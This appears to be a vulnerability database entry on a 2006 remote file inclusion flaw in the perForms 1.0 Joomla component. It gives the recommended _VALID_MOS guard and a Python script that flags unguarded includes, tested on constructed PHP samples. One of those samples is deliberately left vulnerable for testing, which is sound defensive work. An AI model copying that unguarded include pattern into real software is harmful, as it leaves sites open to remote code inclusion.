Vendor: perForms
By: milw0rm.com
CVSS: 7,5 (HIGH)
Remote File Inclusion
CWE: 98
Product Name: perForms
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
perForms <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion
perForms Joomla Component version 1.0 is vulnerable to Remote File Inclusion because the variable $mosConfig_absolute_path is not sanitized. An attacker can exploit this vulnerability by crafting a malicious URL and sending it to the victim. The URL will contain the malicious code, which will be executed on the vulnerable system. The fix for this vulnerability is to add the following code before the vulnerable code:
defined('_VALID_MOS') or die('Direct access to this location is not allowed.');
Mitigation:
Add the following code before the vulnerable code:
defined('_VALID_MOS') or die('Direct access to this location is not allowed.');
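
To check whether the mitigation is in place, the following added example (not part of the original advisory or of the perForms code) flags PHP files that include a path built from $mosConfig_absolute_path without the _VALID_MOS guard appearing earlier in the file. The sample PHP snippets and the com_example path are constructed for illustration, and the check is a file-order heuristic, not a PHP parser.

```python
import re
import sys

# The guard the advisory prescribes: defined('_VALID_MOS') or die(...);
GUARD = re.compile(
    r"defined\s*\(\s*['\"]_VALID_MOS['\"]\s*\)\s*(?:or|\|\|)\s*(?:die|exit)\b", re.I)
# include/require statements whose path is built from $mosConfig_absolute_path
INCLUDE = re.compile(
    r"\b(?:include|require)(?:_once)?\b[^;]*\$mosConfig_absolute_path", re.I)

def strip_comments(src):
    """Blank out /* */ blocks and whole-line // or # comments, keeping line numbers."""
    src = re.sub(r"/\*.*?\*/", lambda m: "\n" * m.group(0).count("\n"), src, flags=re.S)
    return re.sub(r"^[ \t]*(?://|#).*$", "", src, flags=re.M)

def unguarded_includes(php_source):
    """Return (line_number, statement) for each include that no guard precedes."""
    code = strip_comments(php_source)
    guard = GUARD.search(code)
    findings = []
    for m in INCLUDE.finditer(code):
        if guard is None or guard.start() > m.start():
            line_no = code.count("\n", 0, m.start()) + 1
            findings.append((line_no, m.group(0).strip()))
    return findings

# Constructed samples (hypothetical file contents, not the component's real source).
VULNERABLE = """<?php
// constructed sample
require_once($mosConfig_absolute_path . '/components/com_example/helper.php');
"""
PATCHED = """<?php
defined('_VALID_MOS') or die('Direct access to this location is not allowed.');
require_once($mosConfig_absolute_path . '/components/com_example/helper.php');
"""
COMMENTED_GUARD = """<?php
// defined('_VALID_MOS') or die('Direct access to this location is not allowed.');
include($mosConfig_absolute_path . '/components/com_example/helper.php');
"""

if __name__ == "__main__":
    # Usage: python check_guard.py path/to/file.php [more files...]
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8", errors="replace") as fh:
            for line_no, stmt in unguarded_includes(fh.read()):
                print(f"{path}:{line_no}: unguarded include: {stmt}")
```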